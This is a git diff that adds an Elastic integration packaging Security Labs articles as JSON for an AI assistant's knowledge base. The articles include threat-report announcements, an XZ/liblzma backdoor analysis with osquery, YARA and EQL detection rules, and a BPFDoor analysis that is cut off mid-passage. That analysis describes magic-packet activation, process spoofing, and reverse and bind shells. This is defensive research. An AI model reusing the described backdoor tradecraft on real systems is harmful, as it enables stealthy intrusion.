diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS
index 45d11e72fa1..fffb55a6ca5 100644
--- a/.github/CODEOWNERS
+++ b/.github/CODEOWNERS
@@ -362,6 +362,7 @@
/packages/salesforce @elastic/obs-infraobs-integrations
/packages/santa @elastic/security-service-integrations
/packages/security_ai_prompts @elastic/security-generative-ai
+/packages/security_labs_content @elastic/security-generative-ai
/packages/security_detection_engine @elastic/protections
/packages/sentinel_one @elastic/security-service-integrations
/packages/sentinel_one_cloud_funnel @elastic/security-service-integrations
diff --git a/packages/security_labs_content/LICENSE.txt b/packages/security_labs_content/LICENSE.txt
new file mode 100644
index 00000000000..809108b857f
--- /dev/null
+++ b/packages/security_labs_content/LICENSE.txt
@@ -0,0 +1,93 @@
+Elastic License 2.0
+
+URL: https://www.elastic.co/licensing/elastic-license
+
+## Acceptance
+
+By using the software, you agree to all of the terms and conditions below.
+
+## Copyright License
+
+The licensor grants you a non-exclusive, royalty-free, worldwide,
+non-sublicensable, non-transferable license to use, copy, distribute, make
+available, and prepare derivative works of the software, in each case subject to
+the limitations and conditions below.
+
+## Limitations
+
+You may not provide the software to third parties as a hosted or managed
+service, where the service provides users with access to any substantial set of
+the features or functionality of the software.
+
+You may not move, change, disable, or circumvent the license key functionality
+in the software, and you may not remove or obscure any functionality in the
+software that is protected by the license key.
+
+You may not alter, remove, or obscure any licensing, copyright, or other notices
+of the licensor in the software. Any use of the licensor’s trademarks is subject
+to applicable law.
+
+## Patents
+
+The licensor grants you a license, under any patent claims the licensor can
+license, or becomes able to license, to make, have made, use, sell, offer for
+sale, import and have imported the software, in each case subject to the
+limitations and conditions in this license. This license does not cover any
+patent claims that you cause to be infringed by modifications or additions to
+the software. If you or your company make any written claim that the software
+infringes or contributes to infringement of any patent, your patent license for
+the software granted under these terms ends immediately. If your company makes
+such a claim, your patent license ends immediately for work on behalf of your
+company.
+
+## Notices
+
+You must ensure that anyone who gets a copy of any part of the software from you
+also gets a copy of these terms.
+
+If you modify the software, you must include in any modified copies of the
+software prominent notices stating that you have modified the software.
+
+## No Other Rights
+
+These terms do not imply any licenses other than those expressly granted in
+these terms.
+
+## Termination
+
+If you use the software in violation of these terms, such use is not licensed,
+and your licenses will automatically terminate. If the licensor provides you
+with a notice of your violation, and you cease all violation of this license no
+later than 30 days after you receive that notice, your licenses will be
+reinstated retroactively. However, if you violate these terms after such
+reinstatement, any additional violation of these terms will cause your licenses
+to terminate automatically and permanently.
+
+## No Liability
+
+*As far as the law allows, the software comes as is, without any warranty or
+condition, and the licensor will not be liable to you for any damages arising
+out of these terms or the use or nature of the software, under any kind of
+legal claim.*
+
+## Definitions
+
+The **licensor** is the entity offering these terms, and the **software** is the
+software the licensor makes available under these terms, including any portion
+of it.
+
+**you** refers to the individual or entity agreeing to these terms.
+
+**your company** is any legal entity, sole proprietorship, or other kind of
+organization that you work for, plus all organizations that have control over,
+are under the control of, or are under common control with that
+organization. **control** means ownership of substantially all the assets of an
+entity, or the power to direct its management and policies by vote, contract, or
+otherwise. Control can be direct or indirect.
+
+**your licenses** are all the licenses granted to you for the software under
+these terms.
+
+**use** means anything you do with the software requiring one of your licenses.
+
+**trademark** means trademarks, service marks, and similar rights.
diff --git a/packages/security_labs_content/changelog.yml b/packages/security_labs_content/changelog.yml
new file mode 100644
index 00000000000..80d9b957590
--- /dev/null
+++ b/packages/security_labs_content/changelog.yml
@@ -0,0 +1,6 @@
+# newer versions go on top
+- version: "0.0.1"
+ changes:
+ - description: Initial draft of the package
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/13967
diff --git a/packages/security_labs_content/docs/README.md b/packages/security_labs_content/docs/README.md
new file mode 100644
index 00000000000..6bdf6f3c710
--- /dev/null
+++ b/packages/security_labs_content/docs/README.md
@@ -0,0 +1,46 @@
+# Security Labs Content Integration (Beta)
+
+## Overview
+
+The **Security Labs Content** integration provides the security labs content to be used within elastic security.
+
+This integration is in **beta** and subject to changes. Feedback and contributions are welcome.
+
+## Requirements
+
+- Elastic Stack **8.19.x**, **9.1.x**, or later.
+- Kibana with the **Elastic Assistant** plugin enabled.
+
+## Installation
+
+This integration is automatically installed when users setup the **Security AI Assistant knowledge base** in Kibana. No manual setup is required.
+
+## Usage
+
+1. Navigate to **Security Solution** in Kibana.
+2. The security labs content will be used by the security AI assistant
+
+## Developer Guide
+
+Developers updating this integration must regenerate and update the AI prompts in the package:
+
+1. Generate the Security AI Prompts in the Kibana repository:
+ ```sh
+ cd x-pack/solutions/security/plugins/elastic_assistant
+ yarn generate-security-labs-content
+ ```
+2. Copy the updated prompt files to this package:
+ ```sh
+ cd packages/security_labs_content/kibana/security_labs_content
+ rm ./*.json
+ cp $KIBANA_HOME/target/security_labs_content/*.json .
+ ```
+
+## Known Issues & Limitations
+This integration is currently in beta and subject to change.
+
+## Contributing
+Contributions are welcome! If you encounter issues or have suggestions, please open an issue or submit a pull request.
+
+## License
+This integration is subject to the Elastic License.
diff --git a/packages/security_labs_content/img/security-logo-color-64px.svg b/packages/security_labs_content/img/security-logo-color-64px.svg
new file mode 100644
index 00000000000..64deb46be7d
--- /dev/null
+++ b/packages/security_labs_content/img/security-logo-color-64px.svg
@@ -0,0 +1,14 @@
+
+
\ No newline at end of file
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-2022_elastic_global_threat_report_announcement-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-2022_elastic_global_threat_report_announcement-md.json
new file mode 100644
index 00000000000..d437654e552
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-2022_elastic_global_threat_report_announcement-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"2022 Elastic Global Threat Report Announcement\"\nslug: \"2022-elastic-global-threat-report-announcement\"\ndate: \"2022-11-30\"\ndescription: \"Discover our latest findings & strategic recommendations to better stay informed of potential directions threat actors may focus on.\"\nauthor:\n - slug: devon-kerr\nimage: \"gtr-blog-image-720x420.jpg\"\ncategory:\n - slug: reports\n---\n\nToday Elastic Security Labs celebrates another milestone: launching the [2022 Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report), our inaugural summary of threat trends, forecasts, and recommendations. We analyzed millions of telemetry events from sources around the world to share these insights with you; all part of our continued commitment to transparency, and our mission to protect the world's data.\n\nYou can find the report [here](https://www.elastic.co/explore/security-without-limits/global-threat-report), we're excited to share it with you.\n"
+ },
+ "title": "2022 Elastic Global Threat Report Announcement",
+ "slug": "2022-elastic-global-threat-report-announcement",
+ "date": "2022-11-30",
+ "description": "Discover our latest findings & strategic recommendations to better stay informed of potential directions threat actors may focus on.",
+ "author": [
+ {
+ "slug": "devon-kerr"
+ }
+ ],
+ "image": "gtr-blog-image-720x420.jpg",
+ "category": [
+ {
+ "slug": "reports"
+ }
+ ]
+ },
+ "id": "security_labs_content-2022_elastic_global_threat_report_announcement-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-2022_elastic_global_threat_report_helping_security_leaders_navigate_todays_threat_landscape-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-2022_elastic_global_threat_report_helping_security_leaders_navigate_todays_threat_landscape-md.json
new file mode 100644
index 00000000000..37995ae173d
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-2022_elastic_global_threat_report_helping_security_leaders_navigate_todays_threat_landscape-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"2022 Elastic Global Threat Report: Helping security leaders navigate today’s threat landscape\"\nslug: \"2022-elastic-global-threat-report-helping-security-leaders-navigate-todays-threat-landscape\"\ndate: \"2022-11-30\"\ndescription: \"A significant percentage of all cyber threats achieve a degree of success against technical, procedural, and human mitigations. So what is a company to do in the face of such unfavorable odds? Find out in this article.\"\nauthor:\n - slug: ken-exner\nimage: \"gtr-blog-image-720x420.jpg\"\ncategory:\n - slug: reports\n---\n\nAs the threat landscape continues to evolve, cybersecurity stakes are growing exponentially higher for today’s organizations. Between Log4j, geopolitical tension, and increasing ransomware threats, security is not just at the top of the business agenda but also the societal agenda. Meanwhile, threat actors have adopted new capabilities and methods while increasing their cadence of activity.\n\nThreat detection and response has come a long way since the firewall dissolved and the cloud took center stage. AI and machine learning, for example, have been major contributors to the advancement of cybersecurity. Machine learning is being used to identify malicious behavior from bad actors by modeling network behavior and improving overall threat detection.\n\nWhat’s been difficult is the sea of sameness filled with vendors promising products to mitigate today’s threats while preparing for the next one. As the [2022 Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report) outlines, a significant percentage of all threats achieve a degree of success against technical, procedural, and human mitigations. So what is a company to do in the face of such unfavorable odds? At Elastic, we believe there are several ingredients that are critical to managing today’s threat landscape.\n\n## Build a program, not just a tool\n\nVendors need to start thinking about security products as more than software. They are part of a living, breathing program that takes care and feeding. For Elastic, it’s not just about shipping a solution; it’s about offering a holistic approach to security that happens to come with a great product. It’s sharing insights and best practices and creating a community focused on security data intelligence that extends the value of Elastic Security for customers.\n\nThe 2022 Elastic Threat Report is an important part of that program, and we’re excited to share our knowledge with the community. In addition to vital information from the Elastic Security Labs team, the report provides actionable guidance to security practitioners about how to maximize positive outcomes for their organizations.\n\n## It takes an (open) community\n\nThe foundation of any good program is a strong community that can support and foster it. Take Elastic’s commitment to open security, for example. The community born from vendors being transparent about their security controls, detection rules, and threat logic can be a force multiplier of best practices across the entire industry.\n\nWhen vendors engage their experts with experts from across the broader security community about new threats they’ve observed or innovative methods for detecting nuanced attacks, it creates greater scalability of system defenses — not just for the enterprise but also for their customers.\n\nFor example, at Elastic we recently opened our Endpoint Security [protections-artifacts repo](https://github.com/elastic/protections-artifacts), adding to our already open [detection-rules repo](https://github.com/elastic/detection-rules/tree/main/rules), to foster further collaboration with our community and be transparent about how we protect users.\n\n## Treat the cause, not the symptom\n\nDespite the ever-growing threat landscape and the risks that it poses, many organizations are still treating security symptoms instead of the cause. Companies can no longer afford to keep the security team siloed and separate from the engineering team. The two functions must work closely to build products and solutions that can withstand the barrage of advancing threats.\n\nAt Elastic, we design and build products with security in mind from the start, so it’s baked into every solution we ship to our customers. In fact, we take security so seriously that the office of InfoSec is part of the engineering organization.\n\nWe hope that the 2022 Elastic Global Threat Report will help your understanding of the important shifts in the threat landscape, and provide the information you need to make your organization more resilient, prepared, and protected.\n\n[Download the 2022 Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report).\n"
+ },
+ "title": "2022 Elastic Global Threat Report: Helping security leaders navigate today’s threat landscape",
+ "slug": "2022-elastic-global-threat-report-helping-security-leaders-navigate-todays-threat-landscape",
+ "date": "2022-11-30",
+ "description": "A significant percentage of all cyber threats achieve a degree of success against technical, procedural, and human mitigations. So what is a company to do in the face of such unfavorable odds? Find out in this article.",
+ "author": [
+ {
+ "slug": "ken-exner"
+ }
+ ],
+ "image": "gtr-blog-image-720x420.jpg",
+ "category": [
+ {
+ "slug": "reports"
+ }
+ ]
+ },
+ "id": "security_labs_content-2022_elastic_global_threat_report_helping_security_leaders_navigate_todays_threat_landscape-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-500ms_to_midnight-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-500ms_to_midnight-md.json
new file mode 100644
index 00000000000..a0717e23acc
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-500ms_to_midnight-md.json
@@ -0,0 +1,38 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"500ms to midnight: XZ / liblzma backdoor\"\nslug: \"500ms-to-midnight\"\ndate: \"2024-04-05\"\ndescription: \"Elastic Security Labs is releasing an initial analysis of the XZ Utility backdoor, including YARA rules, osquery, and KQL searches to identify potential compromises.\"\nauthor:\n - slug: samir-bousseaden\n - slug: mika-ayenson\n - slug: jake-king\nimage: \"500ms-to-midnight.jpg\"\ncategory:\n - slug: security-research\n - slug: vulnerability-updates\ntags:\n - linux\n - vulnerability\n - cve-2024-3094\n---\n\n## Key Takeaways\n\n* On March 29, 2024, Andres Freund identified malicious commits to the command-line utility XZ, impacting versions 5.6.0 and 5.6.1 for Linux, and shared the information on the oss-security mailing list.\n* Andres’ discovery was made after an increase of _500ms_ in latency was observed with SSH login attempts initiated from a development system, amongst other anomalies.\n* The backdoor identified has been designed to circumvent authentication controls within SSH to remotely execute code, potentially gaining access to other systems in the environment.\n* The code commits were added and signed by [JiaT75](https://tukaani.org/xz-backdoor) (now suspended), who contributed to the popular open source project for several years.\n* Security researchers are still undertaking an initial analysis of the payload, dissecting both the build process and the backdoor.\n* Elastic has released both YARA signatures, detection rules, and osquery queries, allowing Linux system maintainers to understand the impact and block potential compromises early.\n\n## The XZ / liblzma backdoor at a glance\n\nOn March 29 2024, the widely adopted XZ package used within many Linux distributions as a library used by the system to interact with SSH client connections (and many other system utilities) was pulled into the spotlight after a _500ms_ delay with intermittent failures. What began as a routine investigation into that anomaly would take a surprising and unexpected twist: malicious, obfuscated code was planted in the package by a maintainer–code that was also in circulation for a few weeks via a poisoned build process.\n\nAndres Freund, the developer who initially [identified the malicious contributions](https://www.openwall.com/lists/oss-security/2024/03/29/4), observed that the changes had been implemented in versions `5.6.0` and `5.6.1` of the XZ Utils package but had not been widely adopted across all Linux distributions, outside of select bleeding-edge variants typically used for early-stage testing.\n\n[Initial analysis](https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b) has shown that the backdoor is designed to circumvent authentication controls in `sshd` via `systemd` and attempts to execute code within a pre-authentication context. Observations made so far have shown that the malicious code is not in its final target state and was perhaps caught early through haphazard mistakes the developer neglected to consider, causing impacts to legitimate SSH use cases.\n\nAlongside the malicious package being circulated within a small number of Linux distributions, several observations have been made in the popular package management software HomeBrew, which has impacted some macOS users. The maintainers of Homebrew-- and other software packages that included this library-- are presently rolling back to prior versions that aren't impacted by these malicious changes, although mainly out of an abundance of caution, as compromised builds were only targeting deb and rpm packages.\n\nThe following notice was released on the Tukaani Project’s homepage (the project owner of the [XZ Utils Git repository](https://github.com/tukaani-project/xz)) shortly after the news of the backdoor broke.\n\n\n\n\nThe compromise itself, while high risk, is relatively minor in terms of real-world impact given the stage of discovery. This situation should remind security professionals about the importance of understanding supply-chain compromise, monitoring Linux workloads, and auditing system controls. In this situation, defenders had the advantage of time. \n\n## Backdoor analysis\n\n### XZ backdoor build process:\n\n[CVE-2024-3094](https://nvd.nist.gov/vuln/detail/CVE-2024-3094) explains how the changes in the `liblzma` were created from the malicious additions to the library’s build scripts and directly impacts any software that links the library on an impacted system.\n\nThe maliciously modified build script is divided into three stages, starting with the additions in `m4/build-to-host.m4` and progressing through the obfuscation and execution stages. At a high level, some obfuscation techniques include character substitution and selective byte processing commands via the `tr` and `head` commands to decode and execute the malicious payloads in the test files. Interestingly, many impacted tools used are standard Linux system tools typically used by administrators for legitimate purposes.\n\nThe [build process](https://gynvael.coldwind.pl/?lang=en&id=782) runs as follows :\n\n* **Stage 0:** The initial malicious code additions attempt to decode the Stage 1 script (hidden code segments) by changing byte values from specific test files, which under normal circumstances appear corrupt, to form a valid XZ stream.\n* **Stage 1:** This stage leverages a bash file with special checks (e.g., the Linux architecture the script runs on) and Bash commands to analyze the environment (e.g. `[ \"$(uname)\" = \"Linux\" ]`) to ensure compatible conditions are met for the backdoor. Depending on the outcome of the checks, additional malicious scripts or payloads may be executed.\n* **Stage 2:** This phase involves an infected.txt file, which details the altered extraction and compilation code modifications, namely:\n * Reconstruction Data: Byte manipulation and decoding techniques on obfuscated compressed data from test files to reconstruct the malicious payload using commands like `sed` and `awk`\n * Obfuscation and Extraction: Complex decryption and obfuscation techniques using the `tr` command to extract the binary backdoor to remain hidden from typical detection mechanisms\n * Build Process Manipulation: This changes the build and compilation steps to embed the binary backdoor into Linux system processes\n * Extension Mechanism: A design that allows for new scripts and updates to the backdoor without modifying the original payload\n * Future Stage Preparation: Sets the groundwork for malicious follow-up activities, like propagating the backdoor \n\n## Assessing impact:\n\nGiven the limited usage of the impacted beta distributions and software, this compromise should impact few systems. Maintainers of Linux systems are however encouraged to ensure systems are not running impacted versions of `xzutils` / `liblzma` by leveraging the following osquery queries:\n\n[Linux](https://gist.github.com/jamesspi/ee8319f55d49b4f44345c626f80c430f):\n\n```\nSELECT 'DEB Package' AS source, name, version,\n CASE\n WHEN version LIKE '5.6.0%' OR version LIKE '5.6.1%' THEN 'Potentially Vulnerable'\n ELSE 'Most likely not vulnerable'\n END AS status\nFROM deb_packages\nWHERE name = 'xz-utils' OR name = 'liblzma' OR name LIKE 'liblzma%'\nUNION\nSELECT 'RPM Package' AS source, name, version,\n CASE\n WHEN version LIKE '5.6.0%' OR version LIKE '5.6.1%' THEN 'Potentially Vulnerable'\n ELSE 'Most likely not vulnerable'\n END AS status\nFROM rpm_packages\nWHERE name = 'xz-utils' OR name = 'liblzma' OR name LIKE 'liblzma%';\n\n```\n\n[macOS](https://gist.github.com/jamesspi/5cb060b5e0e2d43222a71c876b56daab):\n\n```\nSELECT 'Homebrew Package' AS source, name, version,\n CASE\n WHEN version LIKE '5.6.0%' OR version LIKE '5.6.1%' THEN 'Potentially Vulnerable'\n ELSE 'Most likely not vulnerable'\n END AS status\nFROM homebrew_packages\nWHERE name = 'xz' OR name = 'liblzma';\n```\n\nThe following KQL query can be used to query Elastic Defend file events: \n\n```\nevent.category : file and host.os.type : (macos or linux) and file.name : liblzma.so.5.6.*\n```\n\nAlternatively, manually checking the version of XZ running on a system is as simple as running the [following commands](https://x.com/Kostastsale/status/1773890846250926445?s=20) (from researcher [Kostas](https://twitter.com/Kostastsale)) and checking the output version. Remember, versions 5.6.0 and 5.6.1 are impacted and should be rolled back or updated to a newer version.\n\n```\nfor xz_p in $(type -a xz | awk '{print $NF}' | uniq); do strings \"$xz_p\" | grep \"xz (XZ Utils)\" || echo \"No match found for $xz_p\"; done\n```\n\n## Malware protection\n\nThe following [YARA signature](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Linux_Trojan_XZBackdoor.yar) (disk and in-memory) is deployed in Elastic Defend to block the XZ backdoor.\n\n```\nrule Linux_Trojan_XZBackdoor {\n meta:\n author = \"Elastic Security\"\n fingerprint = \"f1982d1db5aacd2d6b0b4c879f9f75d4413e0d43e58ea7de2b7dff66ec0f93ab\"\n creation_date = \"2024-03-30\"\n last_modified = \"2024-03-31\"\n threat_name = \"Linux.Trojan.XZBackdoor\"\n reference_sample = \"5448850cdc3a7ae41ff53b433c2adbd0ff492515012412ee63a40d2685db3049\"\n severity = 100\n arch_context = \"x86\"\n scan_context = \"file, memory\"\n license = \"Elastic License v2\"\n os = \"linux\"\n strings:\n /* potential backdoor kill-switch as per https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01?permalink_comment_id=5006558#file-hashes-txt-L115 */\n $a1 = \"yolAbejyiejuvnup=Evjtgvsh5okmkAvj\"\n/* function signature in liblzma used by sshd */\n $a2 = { F3 0F 1E FA 55 48 89 F5 4C 89 CE 53 89 FB 81 E7 00 00 00 80 48 83 EC 28 48 89 54 24 18 48 89 4C 24 10 }\n /* unique byte patterns in backdoored liblzma */\n $b1 = { 48 8D 7C 24 08 F3 AB 48 8D 44 24 08 48 89 D1 4C 89 C7 48 89 C2 E8 ?? ?? ?? ?? 89 C2 }\n $b2 = { 31 C0 49 89 FF B9 16 00 00 00 4D 89 C5 48 8D 7C 24 48 4D 89 CE F3 AB 48 8D 44 24 48 }\n $b3 = { 4D 8B 6C 24 08 45 8B 3C 24 4C 8B 63 10 89 85 78 F1 FF FF 31 C0 83 BD 78 F1 FF FF 00 F3 AB 79 07 }\n condition:\n 1 of ($a*) or all of ($b*)\n}\n```\n\nDetections of this signature will appear in Elastic as follows: \n\n\n\n\n## Behavior Detection\n\nLeveraging [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint)’s network and process events, we published a new EQL [detection rule](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml) to identify instances where the SSHD service starts, spawns a shell process and immediately terminates unexpectedly all within a very short time span: \n\n```\nsequence by host.id, user.id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.name == \"sshd\" and\n process.args == \"-D\" and process.args == \"-R\"] by process.pid, process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.parent.name == \"sshd\" and \n process.executable != \"/usr/sbin/sshd\"] by process.parent.pid, process.parent.entity_id\n [process where host.os.type == \"linux\" and event.action == \"end\" and process.name == \"sshd\" and process.exit_code != 0] by process.pid, process.entity_id\n [network where host.os.type == \"linux\" and event.type == \"end\" and event.action == \"disconnect_received\" and process.name == \"sshd\"] by process.pid, process.entity_id\n```\n\n\n\n\n\n\n\n\n## Linux: the final frontier\n\nWhile observations of supply chain-based attacks or exploitation of vulnerabilities rarely reach this level of global press coverage, Elastic’s observations described in the [2023 Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report) show that Linux-based signature events continue to grow in our dataset. This growth is partially tied to growth in the systems we observe that report on threat behavior, but it strongly suggests that adversaries are becoming increasingly focused on Linux systems. \n\nLinux is and will continue to be on the [minds of threat groups](https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor), as its widespread adoption across the internet reinforces its importance. In this case, adversarial groups were trying to circumvent existing controls that would allow for future compromise through other means.\n\nWhile the objectives of the person(s) behind the XZ backdoor haven’t been made clear yet, it is within the technical capabilities of many threat entities focused on espionage, extortion, destruction of data, intellectual property theft, and human rights abuses. With the ability to execute code on impacted Internet-accessible systems, it’s reasonable to assume that bad actors would further infiltrate victims. Elastic Security Labs sees that Linux visibility has been dramatically improving and enterprises have started to effectively manage their Linux populations, but many organizations reacting to this supply chain compromise are still at the start of that process.\n"
+ },
+ "title": "500ms to midnight: XZ / liblzma backdoor",
+ "slug": "500ms-to-midnight",
+ "date": "2024-04-05",
+ "description": "Elastic Security Labs is releasing an initial analysis of the XZ Utility backdoor, including YARA rules, osquery, and KQL searches to identify potential compromises.",
+ "author": [
+ {
+ "slug": "samir-bousseaden"
+ },
+ {
+ "slug": "mika-ayenson"
+ },
+ {
+ "slug": "jake-king"
+ }
+ ],
+ "image": "500ms-to-midnight.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ },
+ {
+ "slug": "vulnerability-updates"
+ }
+ ],
+ "tags": [
+ "linux",
+ "vulnerability",
+ "cve-2024-3094"
+ ]
+ },
+ "id": "security_labs_content-500ms_to_midnight-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-a_peek_behind_the_bpfdoor-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-a_peek_behind_the_bpfdoor-md.json
new file mode 100644
index 00000000000..166a8cffa48
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-a_peek_behind_the_bpfdoor-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"A peek behind the BPFDoor\"\nslug: \"a-peek-behind-the-bpfdoor\"\ndate: \"2022-07-13\"\ndescription: \"In this research piece, we explore BPFDoor — a backdoor payload specifically crafted for Linux in order to gain re-entry into a previously or actively compromised target environment.\"\nauthor:\n - slug: jake-king\n - slug: colson-wilhoit\nimage: \"blog-security-detection-720x420.png\"\ncategory:\n - slug: attack-pattern\n---\n\n## Preamble\n\n[BPFDoor](https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896) is a backdoor payload specifically crafted for Linux. Its purpose is for long-term persistence in order to gain re-entry into a previously or actively compromised target environment. It notably utilizes BPF along with a number of other techniques to achieve this goal, taking great care to be as efficient and stealthy as possible. PWC researchers discovered this very interesting piece of malware in 2021. PWC attributes this back door to a specific group from China, Red Menshen, and detailed a number of interesting components in a high-level threat research post released [last week](https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf).\n\nPWC’s findings indicated that Red Menshen had focused their efforts on targeting specific Telecommunications, Government, Logistics, and Education groups across the Middle East and Asia. This activity has been across a Monday-to-Friday working period, between 01:00 UTC and 10:00 UTC, indicating that the operators of the malware were consistent in their attacks, and operation during a working week.\n\nPerhaps most concerningly, the payload itself has been observed across the last 5 years in various phases of development and complexity, indicating that the threat actor responsible for operating the malware has been at it for some time, undetected in many environments.\n\n> **BPFDoor Tools**\n>\n> The Elastic Security Team has created a few tools that will aid researchers in analyzing the BPFDoor malware.\n>\n> The BPFDoor scanner will allow you to scan for hosts infected with the BPFDoor malware and the BPFDoor configuration extractor will allow you to extrapolate the malware’s configuration or hardcoded values which can lead to additional observations you can use for further analysis, developing additional signatures or connecting to the backdoor utilizing our client.\n>\n> - [BPFDoor scanner](https://www.elastic.co/security-labs/bpfdoor-scanner)\n> - [BPFDoor configuration extractor](https://www.elastic.co/security-labs/bpfdoor-configuration-extractor)\n\n## Attack Lifecycle\n\nThis inherently passive backdoor payload is built to be a form of persistence – a method to regain access if the first or second stage payloads are lost. It is built for and intended to be installed on high-uptime servers or appliances, IoT/SCADA, or cloud systems with access to the Internet. The backdoor usually sits in temporary storage so if a server were to be rebooted or shut down, the backdoor would be lost.\n\nIt should be assumed that if this malware is found on a system the initial-access (1st stage) or post-exploitation (2nd stage) payloads are still most likely present and possibly active elsewhere in the environment. This backdoor excels at stealth, taking every opportunity to blend in and remain undetected.\n\nIn the below steps, we will break BPFDoor’s actions down according to the vast majority of the samples available.\n\n1. When executed the binary copies itself into /dev/shm/. A temporary filesystem /dev/shm stands for shared memory and is a temporary file storage facility serving as an efficient means of inter-process communication\n2. Renames its process to kdmtmpflush, a hardcoded process name\n3. Initializes itself with the -init flag and forks itself. Forking in Linux means creating a new process by duplicating the calling process\n4. Deletes itself by removing the original binary invoked. The forked process continues to run\n5. Alters the forked processes’ creation and modification time values, also known as [timestomping](https://attack.mitre.org/techniques/T1070/006/)\n6. Creates a new process environment for itself and removes the old one setting (spoofing) a new process name. It changes the way it appears on the system akin to wearing a mask. The process is still kdmtmpflush but if you were to run a ps you would see whatever value it set\n7. Creates a process ID (PID) file in /var/run. PID files are text files containing the process of the associated program meant for preventing multiple starts, marking residency, and used by the program to stop itself. This file resides in /var/run, another temporary file storage facility\n8. Creates a raw network socket. On Linux, a socket is an endpoint for network communication that allows you to specify in detail every section of a packet allowing a user to implement their own transport layer protocol above the internet (IP) level\n9. Sets BPF filters on the raw socket. [BPF](https://www.kernel.org/doc/html/v5.12/networking/filter.html) allows a user-space program to attach a filter onto any socket and allow or disallow certain types of data to come through the socket\n10. Observes incoming packets\n11. If a packet is observed that matches the BPF filters and contains the required data it is passed to the backdoor for processing\n12. It forks the current process again\n13. Changes the forked processes working directory to /\n14. Changes (spoofs) the name of the forked process to a hardcoded value\n15. Based on the password or existence of a password sent in the “magic packet” the backdoor provides a reverse shell, establishes a bind shell, or sends back a ping\n\n> **Atypical BPFDoor sample**\n>\n> Of note there is one [sample](https://www.virustotal.com/gui/file/07ecb1f2d9ffbd20a46cd36cd06b022db3cc8e45b1ecab62cd11f9ca7a26ab6d/detection) we have come across that does not seem to exhibit steps 1 - 4. It doesn’t alter its initial name to a hardcoded value and simply executes from its placed location, otherwise, it models the same behavior.\n\nBelow you can see visual representations of the BPFDoor process tree, utilizing Elastic’s Analyzer View. The first image displays the tree prior to active use of the backdoor (i.e reverse shell, bind shell, or pingback) and the second image after a reverse shell has connected and performed post-exploitation activities.\n\n\n\n\n\n## Defense Evasion Insights\n\nBPFDoor is interesting given the anti-forensics, and obfuscation tactics used. Astute readers will observe slight differences in the PID tree visible when running a ps ajxf on an infected host when compared to executed data within the Analyzer View inside of Elastic. This is due to the process name spoofing mentioned in step 6 (above) of the attack lifecycle above. The image below is taken from a system running BPFDoor with an active reverse shell connection established:\n\n\n\nThe difference lies in the fact that kdmtmpflush and sh are run prior to spoofing, and are captured at runtime by Elastic Endpoint. This is an accurate representation of the processes active on the host, further confirming the importance of appropriate observation software for Linux hosts - you can’t always trust what you see on the local system:\n\n\n\nBPFDoor also holds in its repertoire the ability to subvert the traditional Linux socket client - server architecture in order to hide its malicious traffic. The methods which it utilizes to achieve this are both unusual and intriguing.\n\nThe sockets interface is almost synonmous with TCP/IP communication. This simple interface has endured for over 40 years - predating both Linux and Windows implementations.\n\n\n\nBPFDoor uses a raw socket (as opposed to ‘cooked’ ones that handle IP/TCP/UDP headers transparently) to observe every packet arriving at the machine, ethernet frame headers and all. While this might sound like a stealthy way to intercept traffic, it’s actually not – on any machine with a significant amount of network traffic the CPU usage will be consistently high.\n\nThat’s where BPF comes in - an extremely efficient, kernel-level packet filter is the perfect tool to allow the implant to ignore 99% of network traffic and only become activated when a special pattern is encountered. This implant looks for a so-called magic packet in every TCP, UDP and ICMP packet received on the system.\n\nOnce activated, a typical reverse shell - which this back door also supports - creates an outbound connection to a listener set up by the attacker. This has the advantage of bypassing firewalls watching inbound traffic only. This method is well-understood by defenders, however. The sneakiest way to get a shell connected would be to reuse an existing packet flow, redirected to a separate process.\n\nIn this attack, the initial TCP handshake is done between the attacker and a completely legitimate process – for example nginx or sshd. These handshake packets happen to be also delivered to the backdoor (like every packet on the system) but are filtered out by BPF. Once the connection is established, however, BPFDoor sends a magic packet to the legitimate service. The implant receives it and makes a note of the originating IP and port the attacker is using, and it opens a new listening socket on an inconspicuous port (42391 - 43391).\n\nThe implant then reconfigures the firewall to temporarily redirect all traffic from the attacker’s IP/port combination to the new listening socket. The attacker initiates a second TCP handshake on the same legitimate port as before, only now 